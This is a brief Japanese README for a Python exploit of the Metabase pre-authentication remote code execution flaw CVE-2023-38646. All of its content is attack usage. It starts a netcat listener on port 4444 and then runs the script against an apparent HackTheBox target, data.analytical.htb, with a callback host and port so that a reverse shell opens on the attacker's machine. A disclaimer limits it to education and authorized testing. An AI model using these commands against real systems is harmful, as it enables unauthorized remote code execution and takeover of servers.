
Metabaseの事前認証RCE(CVE-2023-38646)のPythonエクスプロイト。認可されたセキュリティテスト用にリバースシェルを確立します。
⚠️ 教育目的および許可されたセキュリティ調査目的に限ります
オリジナルのPoC作成者 securezeron に深く感謝します
攻撃マシン上でリスナーをセットアップします:
nc -nlvp 4444
次に、以下のコマンドを実行します:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
